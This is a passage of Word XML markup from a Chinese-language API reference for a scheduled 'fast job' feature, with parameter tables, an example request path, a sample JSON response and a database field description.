            <w:r>
              <w:t>必填</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="5F89F436" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="16066482" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>jobName</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0E4A95E3" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5E64E3F4" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>作业名</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="07903385" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4A6A9D06" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>updateTimeRange</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7716CE1C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Map</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="40EE0DB2" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>更新时间范围, 例如{min: "2019-06-21 16:39:59", max: "2019-06-28 16:39:59"}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="7ABE72F9" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="42151E3A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>cronEnables</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3F3577A7" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>List&lt;Boolean&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="013C20AE" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>是否开启定时</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="774DAA66" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>排序字段：</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="0020" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1753"/>
        <w:gridCol w:w="1397"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="347F800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98EFEAA" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>参数</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7DCCCA72" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="51018249" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1A5EABAA" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>updatedTime</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3CEC518E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>更新时间</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="0C066AE2" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="41F01238" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="31F7D72B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>执行作业名</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="5031E7DE" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6D3F26E8" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>cronEnable</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2AC48513" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>是否定时执行</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="2CC932E2" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="259911CE" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>lastExecuteTime</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7C4CE3B9" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>最后执行时间</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3DB1D98D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AF3BAB4" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>/external/api/fastjob/job?osType=1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="234E8C58" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="176AD6AD" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"row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c486167657c321a8c925f"</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testxxxx"</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cronEn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cron"</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lastExecuteTime"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t>null</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"lastExecuteTaskRecordId"</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updatedTime"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>"2019-07-03 14:17:05"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"createdTime"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>"2019-07-03 14:17:05"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"realmName"</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oups"</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agents"</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osTags"</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t xml:space="preserve">            </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"task"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>:{</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">                    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"taskTyp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taskId"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>"0478ee5024763edc6d3c"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">                    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"taskName"</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riskInfo"</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params"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </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total"</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charts"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>{}</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78BA61FE"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2568"/>
        <w:gridCol w:w="1430"/>
        <w:gridCol w:w="3296"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="1B5E586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14E417D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段名</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="523327C2" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0F892508" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="178DDAE0" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0D735A77" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>id</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1D624D4A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(24)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5F3BE35A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>作业id</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="5240FA3A" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="38127B6C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3815B2FB" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(128)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="33800B5F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>快速作业名</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="5FDD6799" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="21CC5E2F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>description</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3846061E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(256)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="71658CF4" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>作业描述</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="75367F69" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4BDC3545" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>cronEnable</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="59F465FE" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>boolean</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0FF99785" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>是否开启定时</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="1B29B93D" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="46C2E4E4" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>cron</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3DD3E182" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(128)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="047F1A89" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>定时表达式</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="65F5B32B" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2AB406DE" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>realm</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="577844D8" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3BF5F646" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="436480B3" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1DE76D5D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>updatedTime</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="525B3C1C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>date</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="111DE846" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>更新时间</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="1457E606" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="01AA2082" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>createdTime</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="76ADC7A8" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>date</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="03D16D39" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>创建时间</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="19657822" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0B201E25" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>lastExecuteTime</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6A311A20" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>date</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="78C42FAA" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>上次作业执行时间</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="3255CD3B" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="64BE6F11" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>lastExecuteTaskRecordId</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="78B7BA49" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(24)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3B727DED" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>最近一次执行的task的执行记录id</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="3E2CF3A2" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="20AF2C00" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>task</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7B37AE20" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Task</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="221FEF52" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>快速作业对应的任务详情</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5D8B5555" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Task结构说明：</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="0020" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1059"/>
        <w:gridCol w:w="1268"/>
        <w:gridCol w:w="2775"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="248E0FE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55582A8" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段名</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7C824CA1" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
